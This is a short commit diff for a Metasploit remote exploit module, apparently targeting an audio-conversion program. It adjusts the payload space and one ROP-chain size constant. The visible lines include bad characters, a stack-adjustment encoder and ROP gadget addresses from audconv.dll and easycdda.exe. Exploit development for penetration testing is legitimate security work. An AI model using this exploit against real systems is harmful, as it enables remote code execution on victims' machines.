Fix payload size
parent
3717374896
commit
184ccb9e1e
|
@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
{
|
{
|
||||||
'DisableNops' => true,
|
'DisableNops' => true,
|
||||||
'BadChars' => "\x0a\x3d",
|
'BadChars' => "\x0a\x3d",
|
||||||
'Space' => 2472,
|
'Space' => 2454,
|
||||||
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
|
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
|
||||||
},
|
},
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
|
@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
0x1005d288, # POP EBP # RETN [audconv.dll]
|
0x1005d288, # POP EBP # RETN [audconv.dll]
|
||||||
0x004030c8, # &PUSH ESP # RET 0x08 [easycdda.exe]
|
0x004030c8, # &PUSH ESP # RET 0x08 [easycdda.exe]
|
||||||
0x1005cc2d, # POP EBX # RETN [audconv.dll]
|
0x1005cc2d, # POP EBX # RETN [audconv.dll]
|
||||||
0x000009ff, # 0x000009FF-> EBX
|
0x00000996, # 0x00000996-> EBX
|
||||||
0x1008740c, # POP EDX # RETN [audconv.dll]
|
0x1008740c, # POP EDX # RETN [audconv.dll]
|
||||||
0x00000040, # 0x00000040-> EDX
|
0x00000040, # 0x00000040-> EDX
|
||||||
0x1001826d, # POP ECX # RETN [audconv.dll]
|
0x1001826d, # POP ECX # RETN [audconv.dll]
|
||||||
|
|
Loading…
Reference in New Issue